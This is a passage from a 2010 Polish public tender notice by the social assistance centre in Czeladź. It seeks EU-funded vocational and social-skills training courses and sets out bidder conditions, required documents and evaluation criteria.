-Montaż wodomierza
-Montaż instalacji wodociągowej przeciwpożarowej
-Próba szczelności i odbiór instalacji wodociągowej
-Elementy instalacji kanalizacyjnej
-Łączenie przewodów instalacji kanalizacyjnej
-Przygotowanie stanowiska pracy montera instalacji kanalizacyjnej
-Montaż przewodów i uzbrojenia instalacji kanalizacyjnej bytowo-gospodarczej
-Montaż przewodów i uzbrojenia instalacji kanalizacyjnej deszczowej
-Badanie szczelności i odbiór instalacji kanalizacyjnej
-Przybory sanitarne i warunki ich montażu
-Przygotowanie stanowiska pracy montera przyborów sanitarnych
-Montaż przyborów sanitarnych
-Elementy instalacji gazowych
-Przyłącza gazowe
-Wymagania dotyczące pomieszczeń
-Rodzaje odbiorników
-Odprowadzanie spalin
-Zasady napraw i konserwacji instalacji wodociągowych, kanalizacyjnych i gazowych
-Naprawa i konserwacja istniejących instalacji wodociągowych, kanalizacyjnych i gazowych
-Kontrola prawidłowości działania instalacji wod-kan i gaz 
Program zajęć powinien zawierać w szczególności:
-nazwę i zakres szkolenia,
-czas trwania i sposób organizacji szkolenia,
-wymagania wstępne dla uczestników szkolenia,
-cele szkolenia,
-plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem, w miarę potrzeby, części teoretycznej i części praktycznej,
-treści szkolenia w zakresie poszczególnych zajęć edukacyjnych,
-wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych,
-sposób sprawdzania efektów szkolenia

Część X
kod CPV - 80530000- 8 - usługi szkolenia zawodowego
Nazwa kursu/szkolenia: Kurs ochrony osób i mienia

Usługi szkolenia zawodowego. 
Liczba osób: 4 osoby
Termin realizacji zamówienia: od  dnia podpisania umowy do 31.12.2010r
Miejsce szkolenia
Kurs powinien odbywać się na terenie województwa śląskiego do 20km od Czeladzi. Dojazd będzie możliwy poprzez środki komunikacji miejskiej KZK GOP. Koszty transportu ponosi Zamawiający.
Liczba godzin szkolenia
Należy przedstawić program wszystkich zajęć obejmujący minimum 250 godzin dydaktycznych (godzina szkolenia = godzina lekcyjna =  45 min).
Zajęcia teoretyczne i praktyczne winny odbywać się od poniedziałku do soboty po max 7 godz. lekcyjnych.
Przykładowy zakres tematyczny szkolenia
Program kursu powinien obejmować m. in.:
- blok ogólnoprawny, 
- ochrony mienia, 
- ochrony osób, 
- wyszkolenia strzeleckiego oraz samoobrony,
- technik interwencyjnych.
Program zajęć powinien zawierać w szczególności:
- nazwę i zakres szkolenia,
- czas trwania i sposób organizacji szkolenia,
- wymagania wstępne dla uczestników szkolenia,
- cele szkolenia,
- plan nauczania określający tematy  zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem,   w miarę potrzeby, części teoretycznej i części praktycznej,
- treści szkolenia w zakresie poszczególnych zajęć edukacyjnych,
- wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych,
- sposób sprawdzania efektów szkolenia.

Część XI
Zadanie A
Nazwa szkolenia:Trening umiejętności społecznych + indywidualne i grupowe doradztwo zawodowe + poradnictwo prawne
Usługi szkolenia psychospołecznego wraz ze świadczeniem usług opieki nad dziećmi na czas trwania zajęć. 
Liczba osób: 10 osób oraz 5 dzieci objętych opieką  
Termin realizacji zamówienia: od dnia podpisania umowy do 31.12.2010r
Miejsce szkolenia
Kurs powinien odbywać się na terenie województwa śląskiego do 20 km od Czeladzi. Dojazd będzie możliwy poprzez środki komunikacji miejskiej KZK GOP. Koszty transportu ponosi Zamawiający.
Liczba godzin szkolenia
Należy przedstawić program wszystkich zajęć obejmujący minimum 70 godzin dydaktycznych (godzina szkolenia = godzina lekcyjna =  45 min).
Zajęcia  winny odbywać się od poniedziałku do piątku po max 7 godz. lekcyjnych.
Przykładowy zakres tematyczny szkolenia
Zakres tematyczny kursu powinien m.in. obejmować:
-komunikacja interpersonalna,
-asertywność,
-motywacja do zmiany, 
-sporządzanie osobistego bilansu osiągnięć,
-nauka konstruktywnego reagowania na sytuacje konfliktowe,
-nauka konstruktywnego wyrażania emocji i radzenia sobie z nimi,
-podniesienie kompetencji osobistych, 
-budowanie poczucia własnej wartości,
-strategia definiowania i rozwiązywania problemów życiowych,
- zarządzanie czasem własnym oraz budżetem gospodarstwa domowego,
- badanie predyspozycji zawodowych,
-sporządzanie planu kariery zawodowej,
- metody i sposoby poszukiwania pracy,
- kreowanie wizerunku zawodowego,
- autoprezentacja, wpływ wizerunku na powodzenie w rozmowie kwalifikacyjnej,
- elementy prawa pracy, rodzinnego, cywilnego,
Program zajęć powinien zawierać w szczególności:nazwę i zakres szkolenia,
- czas trwania i sposób organizacji szkolenia,
- wymagania wstępne dla uczestników szkolenia,
- cele szkolenia,
- plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem, w miarę potrzeby, części teoretycznej i części praktycznej,
- treści szkolenia w zakresie poszczególnych zajęć edukacyjnych,
- wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych,
- sposób sprawdzania efektów szkolenia.

Część XI 
Zadanie B
Nazwa szkolenia: Trening umiejętności społecznych + indywidualne i grupowe doradztwo zawodowe- 
Usługi szkolenia psychospołecznego. 
Liczba osób:  30 osób.
Czas trwania szkolenia:  od dnia podpisania umowy do 31.12.2010r
W szkoleniu powyższym będzie uczestniczyć grupa 30 osób. Realizacja szkolenia musi zakończyć się do 31.12.2010r. Ukończenie kursu umożliwi jego uczestnikom zdobycie nowych uprawnień, uaktywni ich na rynku pracy - a tym samym zwiększy ich szanse na zatrudnienie. 
Miejsce szkolenia
Kurs powinien odbywać się na terenie województwa śląskiego do 20km od Czeladzi. Dojazd będzie możliwy poprzez środki komunikacji miejskiej KZK GOP. Koszty transportu ponosi Zamawiający.
Liczba godzin szkolenia
Należy przedstawić program wszystkich zajęć obejmujący minimum 35 godzin dydaktycznych (godzina szkolenia = godzina lekcyjna =  45 min).
Zajęcia teoretyczne i praktyczne winny odbywać się od poniedziałku do piątku po max 7 godz. lekcyjnych.
Przykładowy zakres tematyczny szkolenia
Zakres tematyczny kursu powinien m.in. obejmować:
- komunikacja interpersonalna,
- asertywność,
- motywacja do zmiany, 
- sporządzanie osobistego bilansu osiągnięć,podniesienie kompetencji osobistych, 
- budowanie poczucia własnej wartości,
- badanie predyspozycji zawodowych,
-metody i sposoby poszukiwania pracy,
- kreowanie wizerunku zawodowego,
- autoprezentacja, wpływ wizerunku na powodzenie w rozmowie kwalifikacyjnej,
Program zajęć powinien zawierać w szczególności:
- nazwę i zakres szkolenia,
-czas trwania i sposób organizacji szkolenia,
-wymagania wstępne dla uczestników szkolenia,
- cele szkolenia,
- plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem, w miarę potrzeby, części teoretycznej i części praktycznej,
- treści szkolenia w zakresie poszczególnych zajęć edukacyjnych,
- wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych,
- sposób sprawdzania efektów szkolenia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8, 79.14.00.00-7, 85.31.23.20-8, 80.57.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku  
Metodą spełnia - nie spełnia na podstawie oświadczenia o spełnianiu warunków udziału 
w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Metodą spełnia - nie spełnia na podstawie:
- oświadczenia o spełnianiu warunków udziału w postępowaniu,
- wykazu usług, wykonanych lub wykonywanych,  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu (np. referencje)  potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie.
Wykaz wyżej wymienionych usług winien zawierać co najmniej jedną usługę szkoleniową,  o wartości brutto nie mniejszej niż: 
dla Części I  - 14 000,00 zł
dla Części 2  -   26 600,00 zł
dla Części 3  -   25 900,00 zł
dla Części 4  - 22 200,00 zł
dla Części 5  - 11 400,00 zł
dla Części 6  - 28 000,00 zł
dla Części 7  - 19 800,00 zł
dla Części 8  - 10 500,00 zł
dla Części 9  - 6 000,00 zł
dla Części 10 - 6 000,00 zł
dla Części 11 - 45 000,00 zł</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Metodą spełnia - nie spełnia  na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Metodą spełnia - nie spełnia na podstawie: 
- oświadczenia o spełnianiu warunków udziału w postępowaniu,
- wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia odpowiedzialnych za świadczenie usług, którymi Wykonawca dysponuje lub będzie dysponował i które będą uczestniczyć w wykonywaniu niniejszego zamówienia,
- oświadczenia Wykonawcy o posiadaniu wymaganych uprawnień przez osoby wskazane w wykazie osób, które będą uczestniczyć w wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Metodą spełnia - nie spełnia  na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony formularz oferty z kompletem załączników;
2. Pisemne zobowiązania podmiotów oddających Wykonawcy do dyspozycji niezbędne zasoby na okres korzystania z nich przy wykonywaniu zamówienia, jeżeli wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów. 
3. Pełnomocnictwo, określające jego zakres w przypadku, gdy wykonawcę reprezentuje pełnomocnik.
4. Pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego wykonawców występujących wspólnie w przypadku wspólnego ubiegania się o udzielenie zamówienia.
Przed podpisaniem umowy Wykonawca powinien przedstawić następujące dokumenty:
1. Zaświadczenie o wpisie instytucji szkoleniowej do rejestru instytucji szkoleniowych prowadzonego przez właściwy Wojewódzki Urząd Pracy oraz informacje o kontynuowaniu działalności szkoleniowej w 2010r. - dotyczy wszystkich części zamówienia.
2. Atest Instytutu Spawalnictwa w Gliwicach informujący o uprawnieniach Wykonawcy do szkolenia oraz egzaminowania spawaczy w zakresie metod zawartych w niniejszej Specyfikacji Istotnych Warunków Zamówienia w przypadku składania oferty częściowej na kursy dotyczące spawania wszystkimi wymienionymi metodami w zał. 5 Opis przedmiotu zamówienia - część IV
Ważny minimum do 31.12.2010 r.
3. W przypadku wybrania oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia,
Zamawiający zażąda przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej 
współpracę tych wykonawców (art.23 ust. 4 Ustawy).
4.W przypadku wybrania oferty osoby (osób) fizycznych prowadzącej działalność gospodarczą Zamawiający będzie wymagał przed zawarciem umowy przedstawienia aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany istotnych postanowień zawartej umowy zgodnie z art. 144 ustawy Pzp w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w szczególności w przypadku:
1. zmiany terminu realizacji przedmiotu zamówienia - na podstawie obiektywnych przesłanek zaakceptowanych przez strony.
2. zmiany ilości osób uczestników szkolenia oraz dzieci do opieki na podstawie obiektywnych przesłanek nie dających się przewidzieć np. niestawienia się kandydata na szkolenie pomimo wydania skierowania na szkolenie, przerwania uczestnictwa w szkoleniu np. podjęcie zatrudnienia lub innej pracy zarobkowej, choroba, nieusprawiedliwiona rezygnacja ze szkolenia, którego nie można było przewidzieć w dniu zawarcia umowy.
Wystąpienie następujących okoliczności ze strony Wykonawcy:
1. zmiana kadry realizującej szkolenie w wyniku nieprzewidywalnych zdarzeń losowych np. choroba, śmierć, rozwiązanie stosunku pracy umowy cywilnoprawnej, których nie można było przewidzieć w dniu zawarcia umowy pod warunkiem, że nowo wskazany wykładowca będzie spełniał wymagania wskazane w SIWZ.
2. zmiana miejsca wykonywania zamówienia pod warunkiem, że nowe miejsce wykonania zamówienia zlokalizowane będzie zgodnie z warunkami wskazanymi w SIWZ.
Zmiana nastąpi w formie aneksu do umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.czeladz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej ul. 17 lipca 27 Czeladź , pokój nr 4, tel. 032/265-68-11 wewn. 31, fax. 032/ 265 - 14 - 42, 
e- mail: administracyjny.mops@mops.czeladz.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.09.2010 godzina 09:00, miejsce: Siedziba MOPS W Czeladzi ul. 17 Lipca 27, 41-250 Czeladź pokój nr 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia jest współfinansowany przez UE w ramach Programu   zwiększenia kompetencji zawodowych i społecznych oraz aktywizacja na rynku pracy osób korzystających z pomocy Miejskiego Ośrodka Pomocy Społecznej w Czeladzi  w ramach PO KL 2007 - 2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kurs kosmetyczny i wizażu, manicure, pedicure, stylizacji paznokci + dodatkowy moduł profesjonalnej obsługi klienta z obsługą kasy fiskalne..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi szkolenia zawodowego wraz ze świadczeniem usług opieki nad dziećmi na czas trwania zajęć. 
Cel szkolenia:  Ukończenie kursu umożliwi jego uczestnikom zdobycie nowych uprawnień, uaktywni ich na rynku pracy - a tym samym zwiększy ich szanse na zatrudnienie. 
Liczba osób:  4 osoby i 1 dziecko objęte opieką
Termin realizacji zamówienia: od  dnia podpisania umowy do 31.12.2010r.
Liczba godzin szkolenia
Należy przedstawić program wszystkich zajęć obejmujący minimum 300 godzin dydaktycznych godzina szkolenia = godzina lekcyjna =  45 min..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Zaangażowanie instytucji szkoleniowej w pozyskiwanie miejsc pracy dla przeszkolonych osób - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kurs kucharz, barman, kelner  + dodatkowy moduł profesjonalnej obsługi klienta  z obsługą kasy fiskalnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi szkolenia zawodowego wraz ze świadczeniem usług opieki nad dziećmi na czas trwania zajęć. 
Cel szkolenia:  Ukończenie kursu umożliwi jego uczestnikom zdobycie nowych uprawnień, uaktywni ich na rynku pracy - a tym samym zwiększy ich szanse na zatrudnienie. 
Liczba osób: 7osób i 2 dzieci objęte opieką
Termin realizacji zamówienia: od  dnia podpisania umowy do 31.12.2010r.Liczba godzin szkolenia
Należy przedstawić program wszystkich zajęć obejmujący minimum 300 godzin dydaktycznych godzina szkolenia = godzina lekcyjna =  45 min.
Zajęcia teoretyczne i praktyczne winny odbywać się od poniedziałku do piątku po max 7 godz. lekcyjnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Zaangażowanie instytucji szkoleniowej w pozyskiwanie miejsc pracy dla przeszkolonych osób - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kurs florysty i artystycznego układania roślin z elementami decoupage.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs florysty i artystycznego układania roślin z elementami decoupage
 + dodatkowy moduł profesjonalnej obsługi klienta z obsługą kasy fiskalnej 
Usługi szkoleniowe wraz ze świadczeniem usług opieki nad dziećmi na czas trwania zajęć. 
Cel szkolenia:  Ukończenie kursu umożliwi jego uczestnikom zdobycie nowych uprawnień, uaktywni ich na rynku pracy - a tym samym zwiększy ich szanse na zatrudnienie. 
Liczba osób: 7 osób i 1 dziecko objęte opieką
Termin realizacji zamówienia: od  dnia podpisania umowy do 31.12.2010r.Liczba godzin szkolenia
Zajęcia winny obejmować minimum 200 godzin dydaktycznych godzina szkolenia = godzina lekcyjna = 45 min. Zajęcia teoretyczne i praktyczne winny odbywać się od poniedziałku do piątku po max 7 godz. lekcyjnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Zaangażowanie instytucji szkoleniowej w pozyskiwanie miejsc pracy dla przeszkolonych osób - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kurs spawania metodą MAG i TIG.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi szkolenia zawodowego. 
Cel szkolenia:  Ukończenie kursu umożliwi jego uczestnikom zdobycie nowych uprawnień, uaktywni ich na rynku pracy - a tym samym zwiększy ich szanse na zatrudnienie. 
Liczba osób: 6 osób 
Termin realizacji zamówienia: od  dnia podpisania umowy do 31.12.2010r.
Liczba godzin  i program szkolenia
Szkolenie winno zostać przeprowadzone na podstawie programu zgodnego z wytycznymi Instytutu Spawalnictwa w Gliwicach Ośrodek Kształcenia i Nadzoru Spawalniczego. Ma ono za zadanie przygotować jego uczestników do egzaminu w zakresie podstawowego spawania metodą TIG - elektrodą nietopliwą w osłonie gazu obojętnego - 141 materiałowa 1.1. oraz podstawowego spawania metodą MAG -  elektrodą topliwą w osłonie gazów aktywnych - 135  materiałowa 1.1
Zajęcia teoretyczne i praktyczne winny odbywać się w dni robocze od poniedziałku do soboty po max 7 godz. lekcyjnych godzina szkolenia = godzina lekcyjna =  45 min..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Zaangażowanie instytucji szkoleniowej w pozyskiwanie miejsc pracy dla przeszkolonych osób - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Profesjonalna obsługa firmy  - kurs księgowości, kadry, płace, ZUS.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia
Usługi szkolenia zawodowego. Przewidziano do przeszkolenia 3 osoby. 
Liczba osób: 3 osoby 
Termin realizacji zamówienia: od  dnia podpisania umowy do 31.12.2010r
Miejsce szkolenia
Kurs powinien odbywać się na terenie województwa śląskiego do 20km od Czeladzi. Dojazd będzie możliwy poprzez środki komunikacji miejskiej KZK GOP. Koszty transportu ponosi Zamawiający.
Liczba godzin szkolenia
Należy przedstawić program wszystkich zajęć obejmujący minimum 300 godzin dydaktycznych godzina szkolenia = godzina lekcyjna =  45 min.
Zajęcia teoretyczne i praktyczne winny odbywać się od poniedziałku do piątku po max 7 godz. lekcyjnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Zaangażowanie instytucji szkoleniowej w pozyskiwanie miejsc pracy dla przeszkolonych osób - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Operator koparko - ładowarki wszystkie typy kl. III + Operator koparki  jednonaczyniowej kl. III + Operator wózka widłowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi szkolenia zawodowego. 
Cel szkolenia:  Ukończenie kursu umożliwi jego uczestnikom zdobycie nowych uprawnień, uaktywni ich na rynku pracy - a tym samym zwiększy ich szanse na zatrudnienie. 
Liczba osób: 8 osób
Termin realizacji zamówienia: od  dnia podpisania umowy do 31.12.2010r
Liczba godzin  i program szkolenia
Szkolenie winno zostać zorganizowane zgodnie z rozporządzeniem Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych Dz. U. z 2001 r., Nr 118 poz. 1263..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
